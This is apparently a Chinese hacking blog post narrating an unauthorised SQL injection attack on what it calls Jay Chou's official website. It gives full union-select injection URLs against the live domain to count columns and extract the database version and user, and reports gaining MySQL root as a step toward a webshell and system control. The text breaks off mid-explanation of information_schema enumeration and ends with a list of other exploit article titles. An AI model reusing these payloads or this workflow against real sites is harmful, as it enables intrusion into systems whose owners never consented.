[组图]检测周杰伦官方网站某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。
看注射点,老规矩,先提交个单引号,返回如图1
错误提示是
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
这个提示是很有玄机的,可以看到单引号没有转意,也就是说安全模式没有打开,这为我们后文得到webshell提供了机会。
下面猜字段吧,体力活的说
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,4
很轻松的猜出是四个字段。然后还是按部就班的看用户和权限
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,version()
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,user()
Oh yeah!!是mysql5的root权限,看到这里我觉得服务器拿下应该问题不大了。
和mssql、oracle、db2等数据库一样,mysql5提供了一个系统数据库:information_schema
在这个数据库里我们可以得到很多信息,包括当前用户权限、当前用户权限下可以访问的数据库、表、列名,因此在sql注射中,导致直接暴区数据库,表列名,再也不要‘暴力’咯):
| 检测周杰伦官方网站 | 10-05 | |
| 入侵远古VOD 0day | 10-05 | |
| Discuz!6.0.0注入漏洞 | 09-27 | |
| 动网8.0最新远程注入漏洞来了 | 09-22 | |
| 利用最近热门的Xss漏洞能做什么? | 09-10 | |
| Dz0724补丁补掉的一个xss+补掉的 | 09-04 | |
| 浪人下载和浪人文章的漏洞利用 | 09-01 | |
| XSS跨站脚本及SQL注入漏洞技术分 | 08-27 | |
| 风讯注入0day | 08-25 | |
| 动易2006_SP6最新漏洞得到管理员 | 08-20 | |
| Dvbbs8严重漏洞 | 08-11 | |
| oblog商业版本4.6注射漏洞,直接 | 08-11 | |
您现在的位置: